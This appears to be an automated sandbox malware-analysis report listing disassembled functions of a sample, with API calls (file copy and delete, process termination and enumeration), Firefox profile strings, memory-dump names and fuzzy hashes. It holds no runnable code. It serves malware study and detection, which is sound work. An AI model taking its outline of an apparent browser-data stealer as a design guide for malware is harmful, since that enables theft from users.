Opcode Fuzzy Hash: 1555e5678c072ca4ab9446b2b40093215d410334d5d224d36f00ead4fe18f37f
Instruction Fuzzy Hash: 9EE1BE728502289ACB19FBA5DCD4DEE733AAF54305F50856EE656720D0EF306A8CCF61

Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
lstrlenA.KERNEL32(00000000), ref: 0040D798
lstrlenA.KERNEL32(00000000), ref: 0040D7AC
DeleteFileA.KERNEL32(00000000), ref: 0040D82B

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 47f2e644d34e8f28790d8eb9a2f5f085194dd291f3c92e660b04cfa29a906f22
Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
Opcode Fuzzy Hash: 47f2e644d34e8f28790d8eb9a2f5f085194dd291f3c92e660b04cfa29a906f22
Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A

Function 023FD767 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FD7E8
lstrlen.KERNEL32(00000000), ref: 023FD9FF
lstrlen.KERNEL32(00000000), ref: 023FDA13
DeleteFileA.KERNEL32(00000000), ref: 023FDA92

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
Instruction ID: e178ba0f43e522dbe33b0d49399e753cd5872beef35ca996b1e4dc8e056de3e2
Opcode Fuzzy Hash: c95315d137aedd934db08a2c32def760d310641930853bc4b112f3c5134ffc66
Instruction Fuzzy Hash: 0091FC729002289BCB18FBA5DCD4DEE733AAF54305F50457EE616660D0EF346A88CFA1

Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00A69400,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
lstrlenA.KERNEL32(00000000), ref: 0040DA9F
lstrlenA.KERNEL32(00000000), ref: 0040DAB3
DeleteFileA.KERNEL32(00000000), ref: 0040DB32

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 19c5b6564075ebd3ab9335920b417599cb92f082d03097641c376dd5bdeb35e5
Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
Opcode Fuzzy Hash: 19c5b6564075ebd3ab9335920b417599cb92f082d03097641c376dd5bdeb35e5
Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A

Function 023FDAE7 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

Part of subcall function 02408F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,023F1660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 02408F7D

Part of subcall function 0240AE97: lstrcpy.KERNEL32(00000000,?), ref: 0240AEE9
Part of subcall function 0240AE97: lstrcat.KERNEL32(00000000), ref: 0240AEF9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 023FDB68
lstrlen.KERNEL32(00000000), ref: 023FDD06
lstrlen.KERNEL32(00000000), ref: 023FDD1A
DeleteFileA.KERNEL32(00000000), ref: 023FDD99

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
Instruction ID: 9854b5fd4356986c73c943fba2ac568c1b1d9906f5c98b980e88ed8883698359
Opcode Fuzzy Hash: f963ddadb7543677bfe67c8cf6937e88a8e6e15d5c44649ac160fab5f8c80baf
Instruction Fuzzy Hash: 458102729102289BCB18FBA5DCD4DEE733AAF54304F50457EE656660D0EF346A88CFA1

Function 0246F33E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0246F405
___AdjustPointer.LIBCMT ref: 0246F428
___AdjustPointer.LIBCMT ref: 0246F4C4

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction ID: 63fede9d19a03aff4264b77b6ab622682cf5f74ce0cc511a21d389dacf9c2b56
Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
Instruction Fuzzy Hash: 53510672601602AFDB298F15E858BBA73A6FF60314F16411FD88747E90D731E889CB92

Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
lstrlenA.KERNEL32(00000000), ref: 0040F66B

Strings

^userContextId=4294967295, xrefs: 0040F69C
moz-extension+++, xrefs: 0040F6AD

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 998311485-3310892237
Opcode ID: 83c650cfc0269a93a35d01ef34d01443e55d62c7944c2c18c59c250d51bf75a0
Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
Opcode Fuzzy Hash: 83c650cfc0269a93a35d01ef34d01443e55d62c7944c2c18c59c250d51bf75a0
Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A

Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041967B

Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08

OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
CloseHandle.KERNEL32(00000000), ref: 00419766

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 990b109b9c0dd8af683ffe9626c1f8c662ba6a203f1ed4cb28493b1b2a66ffaa
Instruction ID: 560ccd148ccd609fdd46163d5cc95655726043f4ba77f136f2594cdeec1b1660
Opcode Fuzzy Hash: 990b109b9c0dd8af683ffe9626c1f8c662ba6a203f1ed4cb28493b1b2a66ffaa
Instruction Fuzzy Hash: C4315BB1E01208DBDB14DFE0DD49BEDB779BF44700F10445AF506AB284EB786A88CB56

Function 024098C7 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 024098E2

Part of subcall function 02409147: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,02409915,00000000), ref: 02409152
Part of subcall function 02409147: RtlAllocateHeap.NTDLL(00000000), ref: 02409159
Part of subcall function 02409147: wsprintfW.USER32 ref: 0240916F

OpenProcess.KERNEL32(00001001,00000000,?), ref: 024099A2
TerminateProcess.KERNEL32(00000000,00000000), ref: 024099C0
CloseHandle.KERNEL32(00000000), ref: 024099CD

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
Instruction ID: 582be75a0f8f6a0ee9b270367503e9700e8a17a10e25532023da8554962f43a0
Opcode Fuzzy Hash: 4dd47c962113320da772e9fd3d5ef9085dc50e719928fc1b4404ad0ba2226614
Instruction Fuzzy Hash: 5E310AB1E01258ABDB14DFE0CD88BEDB775FB44700F50456AE506AA2C4EB745A88CF51

Function 02408A77 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 02408AC1
Process32First.KERNEL32(?,00000128), ref: 02408AD5
Process32Next.KERNEL32(?,00000128), ref: 02408AEA

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

CloseHandle.KERNEL32(?), ref: 02408B58

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
Instruction ID: ecde6d6786db25c0ede9d817b9a75de253cda1366daed2b8c29395dcca93d475
Opcode Fuzzy Hash: 25991fec1edfc484e0ac6d238269bf31d59a6f809c3b303f04a25542f2153d22
Instruction Fuzzy Hash: 6F314471941268ABCB24EF55DD84FEEB779EF44705F1045AEE20AA2190EB346F84CF90

Function 00418950 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
wsprintfA.USER32 ref: 004189E0

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Strings

%dx%d, xrefs: 004189D7

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction ID: ec511e81278765dc739de052021e02f912fcc6e2b9c8bb96b49730fbd7d6010e
Opcode Fuzzy Hash: 1a001bca3f565143e81130c797a5c6902db2b2322f06df86b5277f64a988cf2a
Instruction Fuzzy Hash: 8B217FB1E45214AFDB00DFD4DC45FAEBBB9FB48710F10411AFA05A7280D779A900CBA5

Function 0246F25E Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0246F27A
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0246F293

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction ID: 082da04b695669eaf4f1f8f473911a0aaa127cfbb2537448688c93a72fa7f4a7
Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
Instruction Fuzzy Hash: 680128362096219EFA2416767CC8FBB2755FB016B4B35433FE12B895E0EF5248054DC1

Function 02401C57 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00420DA8), ref: 02401C7C
ExitProcess.KERNEL32 ref: 02401C88
strtok_s.MSVCRT ref: 02401C9F

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
Instruction ID: 9be7034a28056e97878b4cf8fa5355d98f4919b78a7d7e4895a7b2dbd2163216
Opcode Fuzzy Hash: bbbcb8835864335667ee073c6e85149c6edd079fa0b75eecad9fe8ddf8d51a3e
Instruction Fuzzy Hash: 02112B74D00209EFCB04DFA5D984AEDBB75FF44309F10806AE91966290E7705B85CF95

Function 00417B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
wsprintfA.USER32 ref: 00417B83

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction ID: c3980473cd5af67d898b1e7796d4e9c7fbcb3b6a311921eeb92eb57329937120
Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction Fuzzy Hash: D4112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E3395940C7B5

Function 02407D77 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 02407DA7
RtlAllocateHeap.NTDLL(00000000), ref: 02407DAE
GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 02407DBB
wsprintfA.USER32 ref: 02407DEA

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction ID: 2edc6ab0acc38d5d1ed56217d907d55b8e8445786e24612b2299e24c0b0d1b6f
Opcode Fuzzy Hash: 0540aeb4fecf84a9ec5d2ba81123392b91a3586b08fb2a3d433314a2c6e1e60a
Instruction Fuzzy Hash: B8112AB2D09218ABCB14DBC9DD45BBEB7B9EB4CB11F10411AF605A2280E2395940C7B5

Function 02407E27 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 02407E5A
RtlAllocateHeap.NTDLL(00000000), ref: 02407E61
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,006D6C48,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 02407E74
wsprintfA.USER32 ref: 02407EAE

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction ID: a1729273c1db532a2f516d805bb92df6524e206831df9639a342ce7891303090
Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction Fuzzy Hash: F311A5B1D06218DBD7108B54DC45FA9B778FB05711F1043E6F519A72C0D7746E80CB95

Function 02403AD0 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00420F44), ref: 02403AD9
StrCmpCA.SHLWAPI(?,00420F48), ref: 02403AF3
StrCmpCA.SHLWAPI(?,00420F4C), ref: 02403B0D
strtok_s.MSVCRT ref: 02403B88

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
Instruction ID: eb2ca669fe8dab4b4e9353132e6c8991ff5de2450072f0cce4cc633b8b4886ea
Opcode Fuzzy Hash: 73115bc3e8dcdeda032c09e7c013334606f369b6221bc6f187dc429dd98a48c5
Instruction Fuzzy Hash: 97111870E002099FDB14DFAAD988BEEBFB9EF44308F0080AAE515AA291D7749541CF55

Function 024096D7 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(02403FA5,80000000,00000003,00000000,00000003,00000080,00000000,?,02403FA5,?), ref: 024096F3
GetFileSizeEx.KERNEL32(000000FF,02403FA5), ref: 02409710
CloseHandle.KERNEL32(000000FF), ref: 0240971E

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction ID: 6b7e1b1763b9fca7a81b9b84e4cf10fa95ed22a30a89f62cf53c94c433c35024
Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction Fuzzy Hash: 3FF0623AE14208FBDB14DFB0DC89F9E77BAAB48700F10C665FA51A72C0E630A641CB41

Function 023FA2F7 Relevance: 6.0, APIs: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(004212DC), ref: 023FA2FF
GetProcAddress.KERNEL32(006D70A8,004212F8), ref: 023FA325
GetProcAddress.KERNEL32(006D70A8,00421310), ref: 023FA33C
FreeLibrary.KERNEL32(006D70A8), ref: 023FA360

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID:
API String ID: 2256533930-0
Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
